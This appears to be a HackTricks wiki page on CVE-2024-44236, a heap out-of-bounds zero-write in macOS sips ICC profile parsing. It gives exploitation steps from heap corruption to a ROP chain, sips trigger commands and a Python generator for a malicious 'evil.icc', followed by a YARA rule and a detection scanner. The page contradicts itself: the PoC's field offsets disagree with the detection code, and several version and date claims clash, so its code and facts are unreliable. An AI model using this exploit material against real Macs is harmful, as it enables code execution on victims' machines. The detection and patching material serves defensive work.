# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)
{{#include ../../banners/hacktricks-training.md}}
## Overview
An out-of-bounds **zero-write** vulnerability in the ICC profile parser of Apple macOS's **Scriptable Image Processing System** (`sips`; macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If an attacker sets `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero out allocator structures or C++ pointers that are later dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).
> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
## Vulnerable Code
```c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
// offsetToCLUT and tagDataSize are attacker-controlled fields of the mAB/mBA tag;
// buffer is the heap allocation holding tagDataSize bytes of tag data.
if (offsetToCLUT <= tagDataSize) {          // '<=' instead of '<': equality passes the check
    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT; with offsetToCLUT == tagDataSize
    // every one of the 16 stores lands past the end of the allocation
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0;                      // no bounds check vs allocated size!
}
```
## Exploitation Steps
1. **Craft a malicious `.icc` profile**
   * Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.
   * Configure the tag table so that **`offsetToCLUT` equals the tag size** (`tagDataSize`).
   * Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
2. **Trigger parsing with any sips operation that touches the profile**
```bash
# verification path (no output file needed)
sips --verifyColor evil.icc
# or implicitly when converting images that embed the profile
sips -s format png payload.jpg --out out.png
```
3. **Heap metadata corruption ➜ arbitrary write ➜ ROP**
On Apple's default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the 0x1000-aligned slab. By placing the profile's tag at the end of such a slab, the 16 zero writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.
### Quick PoC generator (Python 3)
```python
#!/usr/bin/env python3
import struct, sys
HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)] # one tag directly after header
profile = HDR
profile += struct.pack('>I', len(TAGS)) # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
mab = bytearray(52) # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start)
profile += mab
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
### YARA detection rule
```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "mAB/mBA tag whose offsetToCLUT leaves fewer than 16 bytes in the tag (CVE-2024-44236)"
        author = "HackTricks"
    strings:
        $magic = { 61 63 73 70 }   // 'acsp' profile file signature, header bytes 36..39
        $mab   = { 6D 41 42 20 }   // 'mAB '
        $mba   = { 6D 42 41 20 }   // 'mBA '
    condition:
        $magic at 36 and
        // tag table starts at 132: 12-byte entries of signature, offset, size (all big-endian)
        for any i in (0..10) : (       // up to 10 tags
            ($mab at 132 + 12*i or $mba at 132 + 12*i) and
            // offsetToCLUT sits at byte 24 of the tag data; the vulnerable loop zeroes
            // 16 bytes from there, so any value above size-16 runs past the tag
            uint32be(uint32be(132 + 12*i + 4) + 24) + 16 > uint32be(132 + 12*i + 8)
        )
}
```
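As an added example that is not part of the original page (nor Apple's or HackTricks' code), a spec-aware scanner that complements the YARA rule: it walks the ICC tag table and, assuming the ICC.1 layout (profile signature at header byte 36, `offsetToCLUT` at byte 24 of an `mAB `/`mBA ` tag), reports any tag whose `offsetToCLUT` would let the 16-byte zero loop run past the tag. `build_test_profile` is a constructed fixture used only to exercise the check, not a usable colour profile.

```python
#!/usr/bin/env python3
"""Flag mAB/mBA tags whose offsetToCLUT leaves fewer than 16 bytes in the tag,
the condition that makes the sips zero-write run past the heap buffer."""
import struct

HEADER_LEN = 128         # fixed-size ICC profile header; tag count follows it
CLUT_OFFSET_FIELD = 24   # offsetToCLUT is at byte 24 of lutAToBType/lutBToAType
ZERO_WRITE_LEN = 16      # bytes the vulnerable loop clears starting at offsetToCLUT


def find_suspicious_clut_tags(profile: bytes):
    """Return (sig, tag_offset, tag_size, offset_to_clut) for every mAB/mBA tag
    that would drive the vulnerable loop past the tag; offset_to_clut is None
    when the tag does not fit in the file or is too short to hold the field."""
    findings = []
    if len(profile) < HEADER_LEN + 4 or profile[36:40] != b'acsp':
        return findings                              # not an ICC profile
    (tag_count,) = struct.unpack_from('>I', profile, HEADER_LEN)
    for i in range(tag_count):
        entry = HEADER_LEN + 4 + 12 * i              # tag table: sig, offset, size
        if entry + 12 > len(profile):
            break                                    # truncated tag table
        sig, off, size = struct.unpack_from('>4sII', profile, entry)
        if sig not in (b'mAB ', b'mBA '):
            continue
        if off + size > len(profile) or size < CLUT_OFFSET_FIELD + 4:
            findings.append((sig, off, size, None))  # malformed tag entry
            continue
        (clut,) = struct.unpack_from('>I', profile, off + CLUT_OFFSET_FIELD)
        if clut + ZERO_WRITE_LEN > size:             # write would cross the tag end
            findings.append((sig, off, size, clut))
    return findings


def build_test_profile(offset_to_clut: int, tag_size: int = 64) -> bytes:
    """Constructed fixture (not a real colour profile): header with 'acsp' at
    byte 36, a one-entry tag table and a single zero-filled mAB tag."""
    tag_off = HEADER_LEN + 4 + 12                    # tag data follows the table
    hdr = bytearray(HEADER_LEN)
    struct.pack_into('>I', hdr, 0, tag_off + tag_size)   # profile size field
    hdr[36:40] = b'acsp'
    table = struct.pack('>I', 1) + struct.pack('>4sII', b'mAB ', tag_off, tag_size)
    tag = bytearray(tag_size)
    tag[0:4] = b'mAB '
    struct.pack_into('>I', tag, CLUT_OFFSET_FIELD, offset_to_clut)
    return bytes(hdr) + table + bytes(tag)
```

Run `find_suspicious_clut_tags(open(path, 'rb').read())` over profiles extracted from images (for example with `exiftool -icc_profile -b`); an empty list means every `mAB `/`mBA ` tag keeps its CLUT offset at least 16 bytes inside the tag.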
## Impact
Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).
## Detection & Mitigation
* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
* Deploy the YARA rule above on email gateways and EDR solutions.
* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before untrusted files are processed any further.
* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.
* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log.
## References
* Trend Micro Zero Day Initiative, ZDI-24-1445: "Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)", https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
* Apple security updates, HT213981: "About the security content of macOS Sonoma 15.2", https://support.apple.com/en-us/HT213981
{{#include ../../banners/hacktricks-training.md}}